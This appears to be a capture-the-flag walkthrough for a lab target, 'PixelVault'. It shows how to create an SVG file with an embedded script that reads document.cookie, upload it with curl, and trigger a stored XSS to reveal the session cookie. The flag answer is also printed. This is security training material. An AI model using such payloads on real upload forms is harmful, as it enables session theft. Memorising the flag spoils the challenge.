Learn Hacking by Actually Hacking

Difficulty

Easy

Vuln class

Stored XSS via SVG Upload (Same-Origin Script Execution)

Steps

// Objective

Upload a malicious SVG file containing a script tag that executes when the file is viewed directly, stealing the gallery_session cookie.

// Tools required

curlBrowser

// Step-by-step walkthrough

Create a malicious SVG

SVG is XML. XML can contain script elements. Write an SVG file with a script that reads document.cookie.

Command / Input

cat > /tmp/evil.svg << 'EOF' <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <script>alert(document.cookie)</script> <rect width="100" height="100" fill="red"/> </svg> EOF

Upload the SVG

Upload evil.svg through the gallery form in the browser, or with curl.

Command / Input

curl -s -F 'image=@/tmp/evil.svg;type=image/svg+xml' http://localhost:$PORT/upload

⚑ The server checks the file extension (.svg is in the allowlist) but does not strip script content.

Open the uploaded SVG directly

In the browser, click the SVG thumbnail. This navigates directly to /uploads/ID. The server responds with Content-Type: image/svg+xml on the same origin — the browser parses it as XML and executes the script.

Output

Alert popup showing the gallery_session cookie with the flag.

⚑ This only works because the file is served from the same origin. If it were on a CDN subdomain, same-origin policy would block cookie access.

Read the flag

The flag is in the gallery_session cookie value shown in the alert popup.

Output

HackrGG{svg_1s_xml_xss_byp4ss3d_upl04d}

// Flag

Flag value

HackrGG{svg_1s_xml_xss_byp4ss3d_upl04d}

In the gallery_session cookie — revealed when your SVG script executes on the same origin.

PixelVault